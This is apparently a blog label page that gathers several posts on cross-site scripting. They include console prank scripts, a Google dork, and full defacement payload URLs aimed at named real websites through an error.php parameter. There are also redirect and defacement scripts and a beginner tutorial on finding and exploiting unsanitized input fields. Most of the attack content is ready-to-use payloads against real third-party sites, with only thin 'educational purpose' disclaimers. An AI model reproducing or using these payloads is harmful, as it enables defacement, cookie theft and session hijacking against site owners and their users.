Tampilkan postingan dengan label XSS. Tampilkan semua postingan
Tampilkan postingan dengan label XSS. Tampilkan semua postingan

Senin, 20 Juni 2016

How to get XSS Pop Up on any Site | Javascript Injection

How to get XSS Pop Up on any Site | Javascript Injection: Hello guys! so today we are going to discuss about javascript injection :P. By you can get XSS Pop up on any site all you need to do is just paste some javascript vectors in console prompt of your browser. How to get XSS Pop Up on any Site | Javascript Injection

By this you can prank your friends just by pasting javascript on a popular sites like facebook in console and take screenshots and simple send it to your friend :P ok so here we start..How to get XSS Pop Up on any Site | Javascript Injection


How to get XSS Pop Up on any Site | Javascript Injection

Javascript Injection: Produce XSS Pop Up on any Site. Basically, its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection, ok so lets start..

1). For Chrome open console by Ctrl+Shift+I and paste any of these javascript in console box and get pop up :)

2). Do the same for Firefox :) Ctrl+Shift+I :)

To Alert and Changing Title on Website by Javascript(XSS)

just enter the below javascript in console :)
Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");



Getting Cookies By javascripts(XSS)

You can also get cookies by javascript(XSS).. just use below scripts :)
alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie); 
What are you waiting for? Just go ahead and prank your friends :P
So thats it for now if you really enjoyed reading do share and don't forget to leave your feedback :)... 
Read more

Sabtu, 31 Oktober 2015

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox 




error.php XSS (Cross Site Scripting) Vulnerabilities


1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only..

2). Now Type your first Tag to Check the vulnerability 
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)


Read more

Rabu, 08 Agustus 2012

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial


This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSS and some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?

Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>


Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.
Read more

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability


What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the infected or a specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
It will be helpful for understanding XSS , if you have the following prerequisite:
  • Strong Knowledge in HTML,javascript(Reference).
  • Basic Knowledge in HTTP client-Server Architecure(Reference)
  • [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.


Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "HS". It will display the  result .

Now right click on the page and select view source.   search for the string "HS" which we entered in the input field.  Note the location where the input is placed.


Test 2:
Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('HS')</script> .

Now it will display pop-up box with 'HS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:   
Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?
  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement
  • Denial of Service attacks(Dos)

Disclaimer:
This article is intended for educational purpose only.

Read more